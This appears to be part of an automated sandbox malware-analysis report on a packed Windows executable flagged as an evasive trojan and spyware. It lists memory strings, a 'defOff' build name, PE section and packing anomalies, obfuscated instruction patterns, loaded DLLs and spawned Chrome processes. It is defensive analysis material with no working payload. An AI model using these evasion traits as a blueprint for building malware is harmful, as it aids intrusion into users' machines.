Source: 0zBsv1tnt4.exe, 00000000.00000003.1746216617.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741568865.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1782456195.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748780223.000000000609B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746738659.0000000006091000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756118663.0000000006225000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744328710.0000000005F90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741289529.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755437071.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748509228.0000000006097000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742950074.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745418315.0000000006163000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743052594.0000000006054000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750849182.0000000005F92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754602705.00000000060D3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742441245.0000000006101000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754446126.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1750190869.00000000061BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1754752682.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757248589.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1752408659.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740927812.0000000005F93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743156369.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744452780.0000000006066000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748217188.0000000006190000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745262579.000000000606C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746350752.0000000006084000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753356306.00000000061CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1745633174.0000000005F8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1748075823.0000000006089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740750624.0000000006024000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741197031.0000000006035000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1755062115.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743865487.0000000006062000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753968777.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744891784.0000000005F8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1743977874.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756399432.0000000005F94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1742848021.0000000006049000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1753664817.00000000060C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1877406895.0000000006516000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1756610935.00000000060DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1741382035.0000000006029000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740289499.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000002.1876753898.000000000624B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1757085700.0000000005F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1746866682.0000000005F8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1740661280.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1744585438.0000000005F87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1749142697.0000000005F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe
Source: 0zBsv1tnt4.exe, 00000000.00000003.1747250816.0000000006089000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs 0zBsv1tnt4.exe

Uses 32bit PE files

Source: 0zBsv1tnt4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0zBsv1tnt4.exe

Static PE information: Section: ZLIB complexity 0.9996425653594772

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/67@9/5

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_00982070 CoCreateInstance,

0_2_00982070

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0zBsv1tnt4.exe	Virustotal: Detection: 52%
Source: 0zBsv1tnt4.exe	ReversingLabs: Detection: 57%

Source: 0zBsv1tnt4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 0zBsv1tnt4.exe	String found in binary or memory: 1RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

File read: C:\Users\user\Desktop\0zBsv1tnt4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0zBsv1tnt4.exe "C:\Users\user\Desktop\0zBsv1tnt4.exe"
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: Google Drive.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 0zBsv1tnt4.exe

Static file information: File size 2997760 > 1048576

Source: 0zBsv1tnt4.exe

Static PE information: Raw size of xkuacxgz is bigger than: 0x100000 < 0x2b2200

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Unpacked PE file: 0.2.0zBsv1tnt4.exe.950000.0.unpack :EW;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;xkuacxgz:EW;pzmqirjh:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: 0zBsv1tnt4.exe

Static PE information: real checksum: 0x2e58ac should be: 0x2dfedd

PE file contains sections with non-standard names

Source: 0zBsv1tnt4.exe	Static PE information: section name:
Source: 0zBsv1tnt4.exe	Static PE information: section name: .rsrc
Source: 0zBsv1tnt4.exe	Static PE information: section name: .idata
Source: 0zBsv1tnt4.exe	Static PE information: section name: xkuacxgz
Source: 0zBsv1tnt4.exe	Static PE information: section name: pzmqirjh
Source: 0zBsv1tnt4.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F57D1 push cs; iretd	0_3_014F57D2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014F1775 push es; ret	0_3_014F1792
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_3_014EC414 push 70800091h; ret	0_3_014EC419
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_00987069 push es; retf	0_2_00987074
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0098C990 push eax; mov dword ptr [esp], 5C5D5E5Fh	0_2_0098C99E
